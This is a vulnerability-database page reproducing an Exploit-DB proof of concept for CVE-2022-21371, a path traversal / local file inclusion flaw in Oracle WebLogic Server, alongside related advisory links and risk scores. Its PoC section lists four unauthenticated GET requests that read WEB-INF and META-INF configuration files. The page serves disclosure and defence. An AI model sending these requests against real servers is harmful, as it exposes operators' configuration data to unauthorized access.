Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion

🗓️ 27 Jan 2022 00:00:00Reported by Jonah TanType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 396 Views

Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Path Traversal in Oracle Weblogic_Server
5 Jun 202416:29
githubexploit
GithubExploit		Exploit for Path Traversal in Oracle Weblogic_Server
25 Aug 202214:12
githubexploit
0day.today		Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion Vulnerability
27 Jan 202200:00
zdt
ATTACKERKB		CVE-2022-21371
19 Jan 202212:15
attackerkb
Circl		CVE-2022-21371
26 Jan 202211:04
circl
CNNVD		Oracle WebLogic Server 路径遍历漏洞
18 Jan 202200:00
cnnvd
CNVD		Oracle WebLogic Server Input Validation Error Vulnerability (CNVD-2022-05874)
19 Jan 202200:00
cnvd
Check Point Advisories		Oracle WebLogic Server Remote Code Execution (CVE-2022-21371)
3 May 202200:00
checkpoint_advisories
CVE		CVE-2022-21371
19 Jan 202211:26
cve
Cvelist		CVE-2022-21371
19 Jan 202211:26
cvelist
Rows per page
# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371

# Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
Middleware (component: Web Container).
Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
and 14.1.1.0.0.
Easily exploitable vulnerability allows unauthenticated attacker with
network access via HTTP to compromise Oracle WebLogic Server.
Successful attacks of this vulnerability can result in unauthorized access
to critical data or complete access to all Oracle WebLogic Server
accessible data.

# PoC
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jan 2022 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
EPSS0.93419
SSVC
oracle weblogic serverlocal file inclusionoracle fusion middlewarehttpcve-2022-21371windows server 2019
396